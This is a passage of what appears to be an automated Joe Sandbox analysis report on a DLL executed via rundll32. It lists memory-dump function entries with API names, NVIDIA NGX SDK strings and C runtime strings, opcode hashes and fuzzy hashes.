                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleSemaphore$CloseCreate$FreeLibraryModuleRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2305605725-0
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: dd8ee555a69306320eebe891d200e187e02fda6655238bb9e5ba11fcf8265f6f
                                                                                                                                  • Instruction ID: 221a0a431d4840492094c7f9c17d98f7aaeac0dab3ea44899dede8972f580f3a
                                                                                                                                  • Opcode Fuzzy Hash: dd8ee555a69306320eebe891d200e187e02fda6655238bb9e5ba11fcf8265f6f
                                                                                                                                  • Instruction Fuzzy Hash: 0D41F534B59BC391F6749F95BCB81B433ACBF48751BD84238D89DE66608FBC61A0B204
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AllocCreateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1969510515-0
                                                                                                                                  • Opcode ID: 12740f08b17e158aafcf8b993e97012b1c5048d0ee68dbad3ebb90abe51118b6
                                                                                                                                  • Instruction ID: da76caac07fd24083997f501050f38b1d74d902822facf9f3f527d46eb0a86c1
                                                                                                                                  • Opcode Fuzzy Hash: 12740f08b17e158aafcf8b993e97012b1c5048d0ee68dbad3ebb90abe51118b6
                                                                                                                                  • Instruction Fuzzy Hash: 6A212D76708B818AE6749F96B89026AB7A4BB89BD0F044138EE8D47F19DE3DD0518B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$WStrToUTF8Str$WStrToUTF8Str : WideCharToMultiByte failed
                                                                                                                                  • API String ID: 626452242-1232079533
                                                                                                                                  • Opcode ID: 00bc28277f8e413848cc3c53caacea19eefad3600e0077b83c526978867c428e
                                                                                                                                  • Instruction ID: f914bd395932aa634f0aac4d9c582646ed57356340968339c2ff4efaf8e17158
                                                                                                                                  • Opcode Fuzzy Hash: 00bc28277f8e413848cc3c53caacea19eefad3600e0077b83c526978867c428e
                                                                                                                                  • Instruction Fuzzy Hash: 3C61BE22B08B4285FB24DFA1E8A03B823A5FB04BA9F545239DE6D17AD5CF7D9511D340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 1584724053-336475711
                                                                                                                                  • Opcode ID: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                  • Instruction ID: 6d0e94c2461dd84b0edd1b1838a9f5cfcbcc86ad0ff0a6976e9d1f2ec4836e13
                                                                                                                                  • Opcode Fuzzy Hash: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                  • Instruction Fuzzy Hash: 5C41D032320B4881EB46DF26A8053DE63A5FB88BC4F4AD025EF5D4B785DE38D616C304
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd$ExceptionRaise_amsg_exit_getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2951875022-1018135373
                                                                                                                                  • Opcode ID: 19bc60ab7c8d46f879a577fdbd2134b4bea23403eb8b854014e227e093e25ad5
                                                                                                                                  • Instruction ID: cbf58d6bb5dae3ded25f47af1c64b690f48564a0522dc2334fd63855ea109656
                                                                                                                                  • Opcode Fuzzy Hash: 19bc60ab7c8d46f879a577fdbd2134b4bea23403eb8b854014e227e093e25ad5
                                                                                                                                  • Instruction Fuzzy Hash: D52101362046888AE6B2DF56E0407EFB760F78DBA5F058216EF9943795CF38D689C701
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressProc
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExW
                                                                                                                                  • API String ID: 1975335638-1867648532
                                                                                                                                  • Opcode ID: fb2c20d02fc5ce01f6fbea5abba0739a854b0586ab376f0aa36309c75b8c1e82
                                                                                                                                  • Instruction ID: efa1c00cb57bcb84d467dd9ee16f96434f70c14b85828ff537881385e7676853
                                                                                                                                  • Opcode Fuzzy Hash: fb2c20d02fc5ce01f6fbea5abba0739a854b0586ab376f0aa36309c75b8c1e82
                                                                                                                                  • Instruction Fuzzy Hash: 761191A5B09A4682FF79CFD6F9A013512A9AF48BC5F089138D90D8BB65EE6CE450D300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeTask
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXGetPath$\NVIDIA\NGX\models\$error: NGXGetPath failed to obtain path to models
                                                                                                                                  • API String ID: 734271698-558388089
                                                                                                                                  • Opcode ID: cf7afd06313f23bc2d3ce6267aed7f858da56ded38a386cad9cd68212315a593
                                                                                                                                  • Instruction ID: 9e28b2cc695a4f479dbac43bd49919f9f73bbe9e4492c74f01b04369d71065c4
                                                                                                                                  • Opcode Fuzzy Hash: cf7afd06313f23bc2d3ce6267aed7f858da56ded38a386cad9cd68212315a593
                                                                                                                                  • Instruction Fuzzy Hash: 2D0186A1F18A4691FB24DFE1F8603F61314EF89785F842431E90E57A91DE7CE185D750
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1775632426-0
                                                                                                                                  • Opcode ID: 8158fdbed35703439d31d863770e95fddfec0e87a7ccd3433e7dff91f6b0f40e
                                                                                                                                  • Instruction ID: 8886053fca597d44264903d88803d139117f08c336a5ea2a483f1ef60d43a0e3
                                                                                                                                  • Opcode Fuzzy Hash: 8158fdbed35703439d31d863770e95fddfec0e87a7ccd3433e7dff91f6b0f40e
                                                                                                                                  • Instruction Fuzzy Hash: 8691B562F0868245FB718FA294603B966A1EF42BA5F484731DA6D47BC9DFFCE44D8340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                  • Opcode ID: ce750271998e25300b2e646f02fc7aaebec70d68116cdf7c58e233941e4e38ee
                                                                                                                                  • Instruction ID: 54a50374dbd1f0619f5f0edc3d7c0374764c2683045a736cdbb11a7d2bf11c8c
                                                                                                                                  • Opcode Fuzzy Hash: ce750271998e25300b2e646f02fc7aaebec70d68116cdf7c58e233941e4e38ee
                                                                                                                                  • Instruction Fuzzy Hash: D841E53221578486E7A38F15E1403AAB7A1FF99FC0F199165FB8857BD9CF38C6458700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                  • Opcode ID: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                  • Instruction ID: 484109b601cdb60bdd28eb5de1a6cf464c0836e84c8d7e2c0ed591a5095a7b89
                                                                                                                                  • Opcode Fuzzy Hash: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                  • Instruction Fuzzy Hash: E5F0FE322086CCC1EAE7AB55D2413FD5350AB8DBC4F1DC171BB840738B9E20C6989315
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: string too long
                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                  • Opcode ID: d80f9fc73ac2c0aa56d40fc8d5a718c0a56552a0bad6d3397c00ff315f2492a8
                                                                                                                                  • Instruction ID: 4d068781c1a08710b22694d90911747276d76f42a382d111b7b34a5d35fe3e91
                                                                                                                                  • Opcode Fuzzy Hash: d80f9fc73ac2c0aa56d40fc8d5a718c0a56552a0bad6d3397c00ff315f2492a8
                                                                                                                                  • Instruction Fuzzy Hash: CC919D72300B8899EB56CF66C0417EC33A5F319B98F818922EB5D67B99DF34CA59C310
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EmptyRect
                                                                                                                                  • String ID: %s - Cannot allocate CNvMediaStream object$CNvMediaStream::createInstance
                                                                                                                                  • API String ID: 2270935405-2132362898
                                                                                                                                  • Opcode ID: 1909a5ec3928abb6569e16f3c136be8b54ff892250961ddcd135eeaa0d9569e6
                                                                                                                                  • Instruction ID: 73faf0c22fcb717a01b75635e397a93b4368c1e9f8ef3a03b35d3bfd50405896
                                                                                                                                  • Opcode Fuzzy Hash: 1909a5ec3928abb6569e16f3c136be8b54ff892250961ddcd135eeaa0d9569e6
                                                                                                                                  • Instruction Fuzzy Hash: 8951B532B08F8181E710CF66E8501A9B3A8FF88B88F488235CE9D57799EF78D155C750
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$AddressAllocConditionFreeInfoMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CreateProcessAsUserW
                                                                                                                                  • API String ID: 1335820174-1007808920
                                                                                                                                  • Opcode ID: 9313167633e3093886861a610880a2977e5a3e8435188262efbfc91fb09343e7
                                                                                                                                  • Instruction ID: ea0947da0934eab410b0d069dd0c055f91f52ed9e63fd0eb6228be5dbe09e498
                                                                                                                                  • Opcode Fuzzy Hash: 9313167633e3093886861a610880a2977e5a3e8435188262efbfc91fb09343e7
                                                                                                                                  • Instruction Fuzzy Hash: 6331EF2570DB8185EA71CF56F4A026673A8FB88BC0F144135EE8D93B58DF3CD1108B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: SetThreadStackGuarantee$SystemFunction036
                                                                                                                                  • API String ID: 2742660187-2910880125
                                                                                                                                  • Opcode ID: 42a21d8fbdf4c7fd55994a9aa03e55a39c0e69e3b1ff3945505324e5b554d08c
                                                                                                                                  • Instruction ID: 470734aea8243a446865cbc06989f2abf599218348930384a5dc1c3cb3bb4a82
                                                                                                                                  • Opcode Fuzzy Hash: 42a21d8fbdf4c7fd55994a9aa03e55a39c0e69e3b1ff3945505324e5b554d08c
                                                                                                                                  • Instruction Fuzzy Hash: AD01A211F4DA4281FA35AFD2E8612F45355EF18385F481632DA1D163AACE7CA5B9E700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup
                                                                                                                                  • API String ID: 2742660187-3742175580
                                                                                                                                  • Opcode ID: 30162a81ab991935d28d0d1c821ab97a2df501696bf24f83211b68c12433b53e
                                                                                                                                  • Instruction ID: 6b697480ecd2c9db4fdda8b67e8f0712c1ca4889313cf194cca3be132e4d8487
                                                                                                                                  • Opcode Fuzzy Hash: 30162a81ab991935d28d0d1c821ab97a2df501696bf24f83211b68c12433b53e
                                                                                                                                  • Instruction Fuzzy Hash: AFF03751F0A707D2FE39EFD2A8302B45259EF08351F880532CD0D262A1EF6CB585E351
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXCreateDirectoryRecursively$failed to create directory %S - error %d
                                                                                                                                  • API String ID: 4241100979-1361627980
                                                                                                                                  • Opcode ID: 7c024f1bb6d74ec21c2d2f033cf2bf4cf5f2d7814f91e9676ac46fc94289f014
                                                                                                                                  • Instruction ID: 96f90d9cff8a47e1b26446403ee22be39ee74fd917ffb411cf7753402a695474
                                                                                                                                  • Opcode Fuzzy Hash: 7c024f1bb6d74ec21c2d2f033cf2bf4cf5f2d7814f91e9676ac46fc94289f014
                                                                                                                                  • Instruction Fuzzy Hash: 5CF06222F1C54283F7209FA8F86427AA3A4EB44785F544636DE5C87E55DE3CD4548740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakDebugMessage
                                                                                                                                  • String ID: %s (hr=0x%X)$Error
                                                                                                                                  • API String ID: 3531667747-1227332571
                                                                                                                                  • Opcode ID: 4cbfaf4f7e7d06033da862a7b53ddd587f6f84c2425c5882bd8af398c5c79dd9
                                                                                                                                  • Instruction ID: c59010bb86e0b1b681d1a5aafd31b0bf486e1438be936af84c64c4dd9d6a1d79
                                                                                                                                  • Opcode Fuzzy Hash: 4cbfaf4f7e7d06033da862a7b53ddd587f6f84c2425c5882bd8af398c5c79dd9
                                                                                                                                  • Instruction Fuzzy Hash: E6016D65B18A8282F770EBA1F8793BE2264FF98749F801136D98DA6645DE7CE1068600
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: strcspn$Mpunctlocaleconv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882554788-0
                                                                                                                                  • Opcode ID: 58ecd130f00b09f8bef17f7d97753f2651f40aaaca60dedd1df9ae10203089cb
                                                                                                                                  • Instruction ID: 98907bd55804cf440550a9984b5626c23124420e0867e0600be7f70ad20b48f8
                                                                                                                                  • Opcode Fuzzy Hash: 58ecd130f00b09f8bef17f7d97753f2651f40aaaca60dedd1df9ae10203089cb
                                                                                                                                  • Instruction Fuzzy Hash: DFE18E32B04E8889EB529F65C4413ED63B1FB4CB88F658115EE8D57B99DF78C64AC340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: strcspn$Mpunctlocaleconv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882554788-0
                                                                                                                                  • Opcode ID: fce10359bc36b8c483969d2f07a480db227c72c73635d2d78eb5f884875fabf2
                                                                                                                                  • Instruction ID: 7cedfd9f43536d940008849a18cc50f9a484f0cb7e860469d92b1f85863b93e9
                                                                                                                                  • Opcode Fuzzy Hash: fce10359bc36b8c483969d2f07a480db227c72c73635d2d78eb5f884875fabf2
                                                                                                                                  • Instruction Fuzzy Hash: 9DD15B32B05A8889EB52CBB5D4503DD37B1F749BC8F949115EE8967B8ADF38C24AC740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConditionFreeInfoLibraryLoadLocalMaskVerifyVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3996897175-0
                                                                                                                                  • Opcode ID: 7b90ea187a19757d781d7a8508d29235edc04a82aa32fe15ca570446b8cc600a
                                                                                                                                  • Instruction ID: a3bed71c603257707f03b0f933ade1d952538f1cb22d8842f58a53387640f911
                                                                                                                                  • Opcode Fuzzy Hash: 7b90ea187a19757d781d7a8508d29235edc04a82aa32fe15ca570446b8cc600a
                                                                                                                                  • Instruction Fuzzy Hash: ED21D832B08A8185FB74DF66B8642A52295BBC8BC1F054135DE4E9BB54DE3DD4028740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4151157258-0
                                                                                                                                  • Opcode ID: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                  • Instruction ID: 9616a423f97e3a452b980222ce2d2f9dcf0e870d32183e3c52a82e7da15984e5
                                                                                                                                  • Opcode Fuzzy Hash: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                  • Instruction Fuzzy Hash: D0213872204AAC40F7E75E1194D03FD66C0EB88FDAF1AC824FAC6076C5CD28C749A708
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3065451008-0
                                                                                                                                  • Opcode ID: 0d8131eb396a8f802abd1963439fb8b77639c9a0312576953a7fd75421bdef18
                                                                                                                                  • Instruction ID: 7a36634f77aeb09fc8b122d02dad349eca5bb797aedb53d21c6bfaa95b25f159
                                                                                                                                  • Opcode Fuzzy Hash: 0d8131eb396a8f802abd1963439fb8b77639c9a0312576953a7fd75421bdef18
                                                                                                                                  • Instruction Fuzzy Hash: 24218E25B0974286FE74DFE2A97407A6398BF84BC5F084631EB4D07B99DEBCE4088750
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_LockitLockit::__lockfreemallocstd::_std::locale::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2732429687-0
                                                                                                                                  • Opcode ID: 4c7c4e4cdeb69145b53e9993b344bfcc5c5a1a68407a660adf776166b3026ff4
                                                                                                                                  • Instruction ID: 76cda7fa5ebd9028eb80fcaf77cbf10d53a700b3cb3c5ee5f831434e332e8d90
                                                                                                                                  • Opcode Fuzzy Hash: 4c7c4e4cdeb69145b53e9993b344bfcc5c5a1a68407a660adf776166b3026ff4
                                                                                                                                  • Instruction Fuzzy Hash: 84213B71604A8881EBA2CF11E4403DAB3A0F7597E0F548216EB9D57BA6CF7CC6998740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FreeHandleLocalModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2775970868-0
                                                                                                                                  • Opcode ID: 9e3bd118697827140c8c35a418e2f991fb94ac97f9fdae92732178acaa3a4831
                                                                                                                                  • Instruction ID: 0551462ff91d22a87fb988a5bef98e6a35488b8525ef4c5bac8a0e95412434a2
                                                                                                                                  • Opcode Fuzzy Hash: 9e3bd118697827140c8c35a418e2f991fb94ac97f9fdae92732178acaa3a4831
                                                                                                                                  • Instruction Fuzzy Hash: 27112562B0866642FEB95BD6A5A01791291EF44BF2F081638EE6F17BC0DE6DE8414300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4592950432.000001DA01410000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA01410000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_1da01410000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 875692556-336475711
                                                                                                                                  • Opcode ID: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                  • Instruction ID: 52980dd42ddc9f74861d2457c2215ba91059e54f2d657291044bbedf3e3fd304
                                                                                                                                  • Opcode Fuzzy Hash: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                  • Instruction Fuzzy Hash: B841A571728E0C4FEB58EF2C98857E573D1FB99310F41476BE44BC71AADE21E8068686
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
